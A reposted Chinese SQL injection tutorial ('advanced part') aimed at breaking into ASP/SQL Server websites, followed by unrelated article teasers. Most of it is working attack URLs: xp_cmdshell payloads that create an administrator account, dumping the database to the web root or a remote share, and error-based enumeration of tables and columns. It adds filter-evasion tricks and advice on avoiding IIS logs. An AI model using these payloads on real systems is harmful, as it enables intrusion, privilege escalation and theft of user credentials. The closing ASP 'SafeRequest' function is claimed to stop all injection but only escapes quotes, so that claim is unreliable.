SQL注入漏洞全接触--高级篇

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

  看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。

  第一节、利用系统表注入SQLServer数据库

  SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:

  ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--

  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:

  ② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--

  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。

  ③ http://Site/url.asp?id=1 ;;and db_name()>0

  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。

  ④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:inetpubwwwroot1.db’;--

  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\202.96.xx.xxShare1.db),但成功率不高。

  ⑤ http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

  前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。

  ⑥ http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

  从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。

  以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。

  第二节、绕过程序限制继续注入

  在入门篇提到,有很多人喜欢用’号测试注入漏洞,所以也有很多人用过滤’号的方法来“防止”注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。

  在“SQL注入的一般步骤”一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在“利用系统表注入SQLServer数据库”中,有些语句包含有’号,我们举个例子来看看怎么改造这些语句:

  简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。

  第三节、经验小结

  1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。

  2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。

  3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。

  4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。

  5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。

  防 范 方 法

  SQL注入漏洞可谓是“千里之堤,溃于蚁穴”,这种漏洞在网上极为普遍,通常是由于程序员对注入不了解,或者程序过滤不严格,或者某个参数忘记检查导致。在这里,我给大家一个函数,代替ASP中的Request函数,可以对一切的SQL注入Say NO,函数如下:

  Function SafeRequest(ParaName,ParaType)

  '--- 传入参数 ---

  'ParaName:参数名称-字符型

  'ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)

  Dim ParaValue

  ParaValue=Request(ParaName)

  If ParaType=1 then

  If ParaValue="" or not isNumeric(ParaValue) then

  Response.write "参数" & ParaName & "必须为数字型!"

  Response.end

  End if

  Else

  ParaValue=replace(ParaValue,"'","''")

  End if

  SafeRequest=ParaValue

  End function

  文章到这里就结束了,不管你是安全人员、技术爱好者还是程序员,我都希望本文能对你有所帮助

转载于:https://my.oschina.net/likesreed/blog/54961

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/295704.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

除了沉迷酒色之外,你还做过什么?

1 是了,说的就是我▼2 你这叫落井又下石...▼3 如何让衣服瞬间好看?▼4 自己品品...▼5 买家秀与卖家秀▼6 舍友的水杯...妥妥养生局!▼7 还有...▼你点的每个赞,我都认真当成了喜欢

ssl certificate 验证

2019独角兽企业重金招聘Python工程师标准>>> 生成certificate: client 验证certificate: 转载于:https://my.oschina.net/u/255456/blog/545568

使用C#开发交互式命令行应用

前言如果你开发过vue应用,应该对其交互式命令行印象深刻:它允许你无需任何编程经验,仅需回答问题,就可完成vue应用创建。虽然作为.NETer,大部分情况下我们不会使用命令行,但是还是希望能用C#开发出这样的交…

Android之JSON处理器FastJson

FastJson fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发 主要特点: 快速FAST (比其它任何基于Java的解析器和生成器更快,包括jackson) 强大(支持普通JDK类包括任意Java B…

300 s7 置零指令_西门子1200与200、200 SMART置位复位指令的区别

S7-1200的位逻辑指令,这也是我们在学习PLC编程时最先接触到的指令,最基本的指令。位逻辑运算指令是对二进制位进行操作的指令,数据类型是BOOL型,这其中又包括了触点指令与赋值指令、置位与复位指令、沿脉冲检测指令这三个部分。在…

【SAS NOTES】sas对中文的支持

对sas文件的修改 nls\en\SASV9.CFG81行找到/* SAS/SHARE APPLSYS macro library pathname */-SET SASSAML !sasext0\share\sasmacro\在后面加入-DBCSLANG CHINESE-DBCS-DBCSTYPE PCMS180行处找到/* Setup the SAS System load image search paths definition */-PATH (在下一行…

惊现试衣间照片流出??

1 论断句的重要性▼2 这是个有味道的手机壳▼3 啊这...就挺秃然的(素材来源网络,侵删)▼4 男朋友的瘦肉礼物(via.苍南派)▼5 哭泣吧,打工人!!▼6 朋友送的生日礼物被子还是衣服啊…

【转载】创建型-工厂方法模式

介绍:在简单工厂模式中,我们提到,工厂方法模式是简单工厂模式的一个延伸,它属于Gof23中设计模式的创建型设计模式。它解决的仍然是软件设计中与创建对象有关的问题。它可以更好的处理客户的需求变化。引入我们继续来说"new&q…

主机挂载存储_备战CKA每日一题——第3天 | 对接CSI存储知识

本活动在微信公众号【我的小碗汤】上举行,这里参与答题无效哦! 昨日考题 在Kubernetes PVCPV体系下通过CSI实现的volume plugins动态创建pv到pv可被pod使用有哪些组件需要参与? A. PersistentVolumeController CSI-Provisoner CSI controll…

Android之Android Studio常用插件

Android Studio常用插件 Android Studio常用插件ButterKnife Zelezny官网:http://jakewharton.github.io/butterknife/github:https://github.com/JakeWharton/butterknife功能:将光标停留在Activity中onCreate方法中setContentView方法的xml…

如何在 .NETCore 中修改 QueryString ?

咨询区 vcsjones:我有一个绝对路径的 url 包含了 querystring,现在我想对 querystring 进行修改和添加,我不想生硬的用字符串提取,或者是 正则表达式,而且还有恶心的 编码解码 问题,所以我更希望用 .NETCor…

VNCServer 配置

1、首先要配置的是服务端A 确认服务器端是否安装了vncserver使用rpm –qa vnc命令如果收到如下信息说明已经安装了vncserver,[rootlocalhost: ~]#rpm -qa |grep vncgtk-vnc-python-0.3.2-3.el5vnc-server-4.1.2-14.el5gtk-vnc-0.3.2-3.el5vnc-4.1.2-14.el5B从光盘找…

转 c#读写xml文件

已知有一个XML文件&#xff08;bookstore.xml&#xff09;如下&#xff1a;<?xml version"1.0" encoding"gb2312"?><bookstore> <book genre"fantasy" ISBN"2-3631-4"> <title>Oberons Legacy</titl…

招人!招人!这篇推文不要标题,只要你!

对&#xff0c;没错&#xff0c;就是这么直接超模君要要要要招人了因为我们知道很多有才华有能力的人并没有找到适合自己的工作比如你每当夜幕降临躺在床上仰望星空&#xff08;望着天花板&#xff09;的时候你的内心是不是都充满了迷茫&#xff1f;但&#xff0c;这并不是你的…

Android之INSTALL_FAILED_INSUFFICIENT_STORAG解决办法

INSTALL_FAILED_INSUFFICIENT_STORAG 有时候我们项目再次运行的时候,会出现INSTALL_FAILED_INSUFFICIENT_STORAG错误,先翻译下是什么意思,实例化失败由于空间不足,师傅告诉我重启手机,第一次还真有效,后来又有这个错误,然后我到网上找到了一些方法。 解决办法一…

用python爬虫抓站的一些技巧总结

转自http://obmem.info/?p476 1.最基本的抓站 import urllib2 content urllib2.urlopen(http://XXXX).read() -2.使用代理服务器这在某些情况下比较有用&#xff0c;比如IP被封了&#xff0c;或者比如IP访问的次数受到限制等等。 import urllib2 proxy_support urllib2.Prox…

第六届中国开源年会(COSCon'21)开心开源精彩收官

“ 点击蓝字 / 关注我们 ”第六届中国开源年会开心开源 Happy Hacking精彩收官&#xff01;开源社作为国内第一个专注于开源治理、国际接轨、社区发展&#xff0c;以及开源项目的开源社区&#xff0c;完全由志愿贡献于开源事业的个人成员组成。 由开源社主办的 “中国开源年会 …

matlab浮点数求绝对值_MATLAB仿真阵列天线切比雪夫综合法(附代码)

来源&#xff1a;cnblogs在《自适应天线与相控阵》这门课中&#xff0c;了解到了关于理想低副瓣阵列设计的一些方法&#xff0c;其中切比雪夫等副瓣阵列设计方法是一种基础的方法&#xff0c;故将其设计流程写成maltab程序供以后学习使用。在此分享一下。 此方法全称为道尔夫-切…

基于Redis的MQ中间件实现-目录

众所周知&#xff0c;Redis提供了发布订阅功能以及利用List数据结构可以实现消息队列的功能&#xff0c;本来这些也没什么技术难度&#xff0c;但是每次写这些程序时候&#xff0c;生产者和消费者都要写一些重复代码&#xff08;管理Redis&#xff09;和一些容易混乱的代码&…

丘成桐:中国学生基础真的比欧美学生好吗?

全世界只有3.14 % 的人关注了爆炸吧知识“中国学生基础好&#xff1f;这都是多少年来可怕的自我麻醉&#xff01;我不认为中国学生的基础知识学得有多好&#xff01;” “美国最好的学生真是好得不得了。应该这样比较&#xff0c;不管是美国&#xff0c;还是中国&#xff0c;…